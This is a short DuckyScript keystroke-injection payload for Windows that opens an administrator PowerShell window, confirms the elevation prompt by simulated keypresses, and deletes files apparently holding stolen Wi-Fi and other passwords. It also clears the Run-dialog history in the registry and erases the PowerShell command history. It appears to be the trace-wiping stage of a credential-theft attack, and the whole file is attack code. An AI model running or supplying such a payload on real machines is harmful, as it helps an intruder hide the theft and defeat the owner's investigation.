GUI r
DELAY 500
STRING powershell
CTRL+SHIFT+ENTER
DELAY 2000
LEFTARROW
DELAY 1000
ENTER
DELAY 500
STRING Remove-Item "$env:USERPROFILE\Downloads\SavedWiFiPass.txt"; 
ENTER
STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f ; 
ENTER
STRING Remove-Item (Get-PSreadlineOption).HistorySavePath;
ENTER
STRING Remove-Item "C:\Users\Public\Downloads\password.txt"; 
ENTER
STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f ; 
ENTER
STRING Remove-Item (Get-PSreadlineOption).HistorySavePath; 
ENTER
DELAY 500
STRING exit
ENTER
